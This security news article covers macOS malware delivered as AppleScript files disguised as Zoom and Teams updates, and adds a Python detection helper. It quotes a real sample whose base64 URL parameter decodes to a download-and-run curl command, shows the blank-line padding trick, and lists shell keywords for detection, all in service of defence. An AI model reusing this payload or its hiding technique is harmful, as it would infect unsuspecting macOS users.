Hackers Weaponize AppleScript to Creatively Deliver macOS Malware Mimic as Zoom/Teams Updates

Threat actors continue to evolve their techniques for bypassing macOS security controls, shifting away from traditional attack vectors that Apple has systematically patched.

After Apple removed the Control-click (right-click) "Open" override for Gatekeeper, a change announced in August 2024 and shipped with macOS Sequoia, attackers turned to a delivery mechanism that needs no override at all: compiled AppleScript files (.scpt) with deceptive names.

These .scpt files are increasingly being leveraged to distribute malware that masquerades as legitimate software updates, including fake Zoom and Microsoft Teams installers.

The technique relies on the fact that .scpt files open in Script Editor.app by default, so a double-click drops the victim into a trusted Apple application that can run the script with one click.

When a user double-clicks such a file, Script Editor shows its source. The visible top of the file is filled with comments posing as update instructions that urge the user to run the script.

The operators push the actual code hundreds of blank lines below those instructions, so the payload is out of view unless the user scrolls.


Clicking the "Run" button or pressing Cmd+R then executes the script. Gatekeeper does not stop this: it assesses the application being launched, and that application is Script Editor, which is Apple's own signed binary. The quarantine attribute on the downloaded .scpt file is irrelevant to a script that Script Editor runs as a document, so Apple's download protections are sidestepped rather than defeated.

Fake Chrome Update Example (Source – Pepe Berba)

Security analysts at Moonlock Labs and researcher Pepe Berba identified this technique gaining prominence in recent months, noting that it had previously been observed in advanced persistent threat operations.

Pepe Berba noted that while malicious AppleScript files themselves are not new, the growing number of samples using this technique is a concerning trend, particularly as commodity malware families such as MacSync Stealer and Odyssey Stealer have adopted it.

This represents a classic case of advanced techniques trickling down from state-sponsored actors to common cybercriminal operations.

Technical structure

The technical structure of these scripts employs several deception tactics.

One analyzed sample contains the following two lines of AppleScript:

set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY="
do shell script "open -g " & quoted form of teamsSDKURL

Execution flow (Source – Pepe Berba)

The URL's host is Microsoft's own documentation site, which is what a suspicious user would check. The malicious part is the v= query parameter: it is base64 and decodes to curl -sL aubr.io/x.sh | sh -v, a download-and-run one-liner. The open -g command loads the page in the default browser without bringing it to the foreground, so the victim sees a legitimate-looking Microsoft URL while the script continues in the background.
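Both tricks discussed so far, the blank-line padding that hides the code from view and the shell command tucked into a query parameter of a legitimate-looking URL, are straightforward to screen for once the script source is in hand. The triage helper below is an added example written for this article, not code from the researchers cited. On macOS the source text of a compiled .scpt would come from osadecompile; here it is replaced by a constructed sample that reuses the URL quoted above but assumes the decoy comments and the amount of padding. The padding threshold and the shell-keyword list are assumptions for illustration.

```python
"""Triage helper for suspicious .scpt sources (added example, not from the article)."""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample standing in for the output of `osadecompile lure.scpt`.
# The URL is the one quoted in the article; the two decoy comment lines and the
# 200 blank lines of padding are assumptions made for this example.
SAMPLE_SCRIPT = (
    "-- Microsoft Teams SDK Update\n"
    "-- Press Cmd+R or click Run to install the update\n"
    + "\n" * 200
    + 'set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams'
    '/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY="\n'
    + 'do shell script "open -g " & quoted form of teamsSDKURL\n'
)

URL_RE = re.compile(r'https?://[^\s"\']+')
# Words that, in a decoded query value, indicate a command rather than data (assumed list).
SHELL_WORDS = re.compile(r"\b(curl|wget|sh|bash|zsh|osascript|base64|chmod|nohup|eval)\b")
PADDING_THRESHOLD = 50  # assumed: legitimate scripts rarely contain 50+ consecutive blank lines


def longest_blank_run(text):
    """Length of the longest run of consecutive blank lines in the script."""
    longest = run = 0
    for line in text.splitlines():
        run = run + 1 if not line.strip() else 0
        longest = max(longest, run)
    return longest


def decode_b64_param(value):
    """Return the decoded string if value is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() and len(text) >= 8 else None


def decoded_commands(url):
    """List (param, decoded) pairs for query parameters that hide a shell-looking command."""
    found = []
    for name, values in parse_qs(urlsplit(url).query).items():
        for value in values:
            decoded = decode_b64_param(value)
            if decoded and SHELL_WORDS.search(decoded):
                found.append((name, decoded))
    return found


def triage(script_text):
    """Collect the indicators the article describes and a single suspicious verdict."""
    urls = URL_RE.findall(script_text)
    findings = {
        "blank_padding": longest_blank_run(script_text),
        "shell_exec_lines": [l.strip() for l in script_text.splitlines() if "do shell script" in l],
        "urls": urls,
        "hidden_commands": [c for u in urls for c in decoded_commands(u)],
    }
    # A decoded command is damning on its own; heavy padding only counts when
    # the script also shells out, so a long but harmless script is not flagged.
    findings["suspicious"] = bool(findings["hidden_commands"]) or (
        findings["blank_padding"] >= PADDING_THRESHOLD and bool(findings["shell_exec_lines"])
    )
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_SCRIPT), indent=2))
```

On the constructed sample the helper reports 200 lines of padding, one do shell script line, and the hidden command curl -sL aubr.io/x.sh | sh -v recovered from the v= parameter, which is exactly the decode of the string quoted above. Checking the downloaded file's quarantine flag (xattr -p com.apple.quarantine file.scpt) is still worth doing for the timeline, but as the article notes it is not what decides whether the script runs.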

The filenames themselves serve as the primary deception layer, with variants including “MSTeamsUpdate.scpt,” “Zoom SDK Update.scpt,” and “Microsoft.TeamsSDK.scpt.”

The detection evasion side of these attacks deserves particular attention.

Many of these .scpt files currently have zero detections on VirusTotal, giving attackers significant operational runway before security vendors ship signatures for them.

The files often arrive through phishing emails or compromised websites offering software updates, targeting users seeking legitimate version upgrades.

This attack vector is a significant challenge for macOS security because it exploits user trust in familiar product names while running through a native, Apple-signed tool that users and administrators see every day.

Organizations should tell users that no genuine Zoom or Microsoft Teams update arrives as a .scpt file that opens in Script Editor, should insist on updates from official channels, and should deploy endpoint detection that monitors Script Editor and osascript execution, including the /bin/sh child processes that do shell script spawns.
